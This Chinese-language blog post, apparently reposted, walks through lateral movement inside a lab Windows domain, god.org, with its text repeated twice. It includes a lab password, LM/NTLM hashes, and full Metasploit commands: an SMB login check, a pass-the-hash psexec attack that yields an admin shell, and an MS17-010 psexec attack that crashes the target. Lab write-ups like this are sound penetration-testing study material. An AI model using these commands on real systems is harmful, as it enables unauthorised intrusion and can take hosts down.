内网横向渗透 之 ATT&CK系列一 之 横向渗透域主机
作者:互联网
前言
上一篇文章中已获取了关于域的一些基本信息,在这里再整理一下,不知道信息收集的小伙伴可以看回上一篇文章哦
域:god.org
域控 windows server 2008:OWA,192.168.52.138
域主机 windows server 2003:ROOT-TVI862UBEH,192.168.52.141
win7内网ip:192.168.52.143
win7 username : Administrator domain : GOD password : hongrisec@2022(因为登陆域控机win2008的时候会要求改密码,我这个改成hongrisec@2022)
LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5
横向渗透
通过win7的nmap对域成员进行漏洞端口扫描,使用 where nmap 可以得到nmap的安装路径
nmap.exe --script=vuln 192.168.52.141
存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)
使用 scanner/smb/smb_login 验证SMB登录
use scanner/smb/smb_login set RHOSTS 192.168.52.141 set SMBPass hongrisec@2022 set SMBUSER Administrator set SMBDomain GOD run
说明win7的账号密码对域成员也有效
至此,域成员存在漏洞,且知道用户名、密码、域,使用漏洞进行渗透获取域内使用权限
因为是内网windows系统,这里我选择用哈希传递攻击,使用的模块是 exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp set RHOSTS 192.168.52.141 set SMBDomain god set SMBUser Administrator set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 # 这里是用哈希密码传递,冒号前面的是LM哈希值,冒号后面的是NTLM哈希值 run
查看权限 whoami
可以看到,是管理员的最高权限,这里就不需要提权了,至此,域主机已被攻破!
彩蛋
域主机 windows server 2003 存在ms17-010漏洞,可以通过ms17-010漏洞进行攻击
注:msfconsole中的ms17_010_eternalblue模块仅支持x64,而咱们的目标域主机是x86的,所以这里不适用
使用模块 ms17_010_psexec 进行攻击,这里选择这个模块的原因:在域内,且存在ms17-010漏洞
use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set SMBDomain GOD set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 set SMBUser Administrator run
域主机蓝屏
msfconsole报错
至此攻击成功,没有反弹shell,因为目标域主机已蓝屏!
TRANSLATE with
前言
上一篇文章中已获取了关于域的一些基本信息,在这里再整理一下,不知道信息收集的小伙伴可以看回上一篇文章哦
域:god.org
域控 windows server 2008:OWA,192.168.52.138
域主机 windows server 2003:ROOT-TVI862UBEH,192.168.52.141
win7内网ip:192.168.52.143
win7 username : Administrator domain : GOD password : hongrisec@2022(因为登陆域控机win2008的时候会要求改密码,我这个改成hongrisec@2022)
LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5
横向渗透
通过win7的nmap对域成员进行漏洞端口扫描,使用 where nmap 可以得到nmap的安装路径
nmap.exe --script=vuln 192.168.52.141
存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)
使用 scanner/smb/smb_login 验证SMB登录
use scanner/smb/smb_login set RHOSTS 192.168.52.141 set SMBPass hongrisec@2022 set SMBUSER Administrator set SMBDomain GOD run
说明win7的账号密码对域成员也有效
至此,域成员存在漏洞,且知道用户名、密码、域,使用漏洞进行渗透获取域内使用权限
因为是内网windows系统,这里我选择用哈希传递攻击,使用的模块是 exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp set RHOSTS 192.168.52.141 set SMBDomain god set SMBUser Administrator set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 # 这里是用哈希密码传递,冒号前面的是LM哈希值,冒号后面的是NTLM哈希值 run
查看权限 whoami
可以看到,是管理员的最高权限,这里就不需要提权了,至此,域主机已被攻破!
彩蛋
域主机 windows server 2003 存在ms17-010漏洞,可以通过ms17-010漏洞进行攻击
注:msfconsole中的ms17_010_eternalblue模块仅支持x64,而咱们的目标域主机是x86的,所以这里不适用
使用模块 ms17_010_psexec 进行攻击,这里选择这个模块的原因:在域内,且存在ms17-010漏洞
use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set SMBDomain GOD set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 set SMBUser Administrator run
域主机蓝屏
msfconsole报错
至此攻击成功,没有反弹shell,因为目标域主机已蓝屏!
标签:CK,set,渗透,横向,192.168,010,windows,ms17,smb 来源: https://www.cnblogs.com/spmonkey/p/16103826.html